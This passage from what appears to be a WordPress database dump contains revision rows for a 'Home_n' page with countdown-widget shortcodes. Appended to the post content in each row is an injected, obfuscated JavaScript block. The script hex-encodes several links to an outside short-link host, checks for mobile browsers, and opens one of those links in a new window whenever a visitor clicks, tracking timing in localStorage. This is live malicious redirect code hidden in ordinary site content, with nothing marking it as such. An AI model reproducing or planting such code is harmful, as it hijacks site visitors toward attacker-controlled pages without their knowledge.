)|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:46:44','2022-11-08 21:46:44','',3066,'https://gsw2023.com/?p=3076',0,'revision','',0),
(3077,1,'2022-11-08 21:47:25','2022-11-08 21:47:25','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#8224e3\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Open Sans|font_call:Open+Sans|variant:600\" tick_unit_style=\"font-weight:600;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:47:25','2022-11-08 21:47:25','',3066,'https://gsw2023.com/?p=3077',0,'revision','',0),
(3078,1,'2022-11-08 21:47:38','2022-11-08 21:47:38','<p>[vc_row][vc_column width=\"1/2\"][vc_column_text]<strong>I am text block.</strong>[/vc_column_text][/vc_column][vc_column width=\"1/2\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" br_style=\"solid\" br_color=\"#ffffff\" timer_bg_color=\"#ffffff\" tick_col=\"#8224e3\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:Open Sans|font_call:Open+Sans|variant:700\" tick_unit_style=\"font-weight:700;\"][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Home_n','','inherit','closed','closed','','3066-revision-v1','','','2022-11-08 21:47:38','2022-11-08 21:47:38','',3066,'https://gsw2023.com/?p=3078',0,'revision','',0),
